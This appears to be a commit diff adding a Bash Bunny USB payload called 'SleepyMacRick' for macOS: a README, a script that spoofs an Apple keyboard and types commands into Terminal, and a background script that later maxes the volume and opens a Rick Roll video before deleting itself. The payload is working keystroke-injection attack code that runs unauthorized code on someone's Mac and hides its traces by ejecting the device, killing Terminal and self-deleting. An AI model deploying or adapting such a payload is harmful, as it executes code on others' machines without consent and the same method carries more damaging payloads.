commit
8c2b59bfba
|
@ -0,0 +1,17 @@
|
||||||
|
# SleepyMacRick
|
||||||
|
* Author: 90N45
|
||||||
|
* Version: 1.0
|
||||||
|
* Target: Mac
|
||||||
|
* Attackmodes: HID, STORAGE
|
||||||
|
|
||||||
|
### Description
|
||||||
|
Installs a script that will listen for user activity in the background. When the user starts working on his machine, a „Rick Roll“ will be triggered.
|
||||||
|
|
||||||
|
### Status
|
||||||
|
| LED | State |
|
||||||
|
| --- | --- |
|
||||||
|
| Magenta solid (SETUP) | Set ATTACKMODE |
|
||||||
|
| Yellow single blink (ATTACK) | Setup and run script on the Mac |
|
||||||
|
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | „Rick Roll“ is ready and listening for activity |
|
||||||
|
|
||||||
|
*Average runtime: 23 seconds*
|
|
@ -0,0 +1,25 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
# Open terminal
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 1000
|
||||||
|
QUACK STRING terminal
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1500
|
||||||
|
|
||||||
|
QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 1000
|
||||||
|
|
||||||
|
QUACK STRING "diskutil eject /Volumes/BashBunny/"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING "killall Terminal"
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
LED FINISH
|
|
@ -0,0 +1,14 @@
|
||||||
|
#! /bin/bash
|
||||||
|
|
||||||
|
sleep 3
|
||||||
|
inactive=$(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name')
|
||||||
|
|
||||||
|
while [[ ${inactive} = $(osascript -e 'tell application "System Events" to tell (first process whose frontmost is true) to return name') ]]; do
|
||||||
|
sleep 0.5
|
||||||
|
done
|
||||||
|
|
||||||
|
osascript -e "set volume output volume 100"
|
||||||
|
open -u "https://www.youtube.com/watch?v=xvFZjo5PgG0"
|
||||||
|
|
||||||
|
# Self destruct
|
||||||
|
rm /tmp/rick.sh
|
Loading…
Reference in New Issue